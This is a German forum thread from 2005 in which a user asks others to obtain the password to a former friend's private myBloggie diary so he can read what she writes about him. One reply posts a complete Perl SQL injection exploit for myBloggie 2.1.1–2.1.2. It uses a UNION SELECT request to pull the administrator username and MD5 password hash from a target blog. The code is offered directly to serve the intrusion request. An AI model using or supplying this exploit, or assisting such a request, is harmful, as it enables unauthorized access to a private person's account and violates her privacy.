MyBlog PW herrausbekommen

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Frontyi, 27. September 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 27. September 2005
    Hi, ich kenne eine, die hat bei MYBlog ihr Tagebuch oder wie man das dort nennt. Nun hat sie ein Pw draufgepackt, da wir uns total gestritten haben. Aber da ich sieh schon länger kenne, ist sie wieder mal derbst am Labern und da wüste ich gerne, was sie wieder in die Welt setzt. Nun wollte ich fragen ob mir jemand das Pw besorgen kann? Wäre super nett von demjenigen!

    Greez
    Frontyi
     
  2. 28. September 2005
    Na ja ich gib dir mal einen Tipp! Hier wird keiner Antworten weil wer will schon für andere "hacken"? Frag lieber wie das funktionieren könnte und ob man dir Tipps geben kann dann läufts besser!

    Gib doch mal nen Link an, dass man sich das auch mal angucken kann!
     
  3. 28. September 2005
    damit kriegt man admin pw
    hier

    Code:
    #!/usr/bin/perl -w
    #
    # SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2
    # This exploit show the username of the administrator of the blog and his password crypted in MD5
    # Related advisories: (Italian) http://www.codebug.org/index.php?subaction=showfull&id=1115310052&archive=&start_from=&ucat=6&
    # (English) http://www.packetstormsecurity.org/0505-advisories/codebug-9.txt
    # Patch: http://mywebland.com/forums/viewtopic.php?t=180
    # Coded by Alberto Trivero and Discovered with CorryL
    
    use LWP::Simple;
    
    print "\n\t=======================================\n";
    print "\t= Exploit for myBloggie 2.1.1 - 2.1.2 =\n";
    print "\t= Alberto Trivero - codebug.org =\n";
    print "\t=======================================\n\n";
    
    if(!$ARGV[0] or !($ARGV[0]=~/http/) or !$ARGV[1] or ($ARGV[1] ne '2.1.1' and $ARGV[1] ne '2.1.2')) {
     print "Usage:\nperl $0 [full_target_path] [version: 2.1.1 OR 2.1.2]\n\nExample:\nperl $0 http://www.example.com/mybloggie/ 2.1.1\n";
     exit(0);
    }
    
    $url=q[index.php?month_no=1&year=1&mode=vdate&date_no=1%20UNION%20SELECT%20null,null,null,user,password,null,null,null,null%20FROM%20blog_user/*];
    $page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
    print "[+] Connected to: $ARGV[0]\n";
    if($ARGV[1] eq '2.1.1') {
     $page=~m/<tr><td colspan="3" class="subject">(.*?)<\/td><\/tr>/ && print "[+] Username of administrator is: $1\n";
     print "[-] Unable to retrieve username\n" if(!$1);
    }
    else {
     $page=~m/<src="templates\/aura\/images\/permalink.gif" border="0" title="Permalink"><\/a> (.*?)<\/td><\/tr>/ && print "[+] Username of administrator is: $1\n";
     print "[-] Unable to retrieve username\n" if(!$1);
    }
    $page=~m/<tr><td colspan="3" class="message">(.*?)<\/td><\/tr>/ && print "[+] MD5 hash of password is: $1\n";
    print "[-] Unable to retrieve hash of password\n" if(!$1);
     
  4. 29. September 2005
    Ehm *öhm* und was genau soll ich damit machen'? Kannst du se schnell besorgen? Wäre SAUUU GEIL VON DI

    Frontyi
     
  5. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.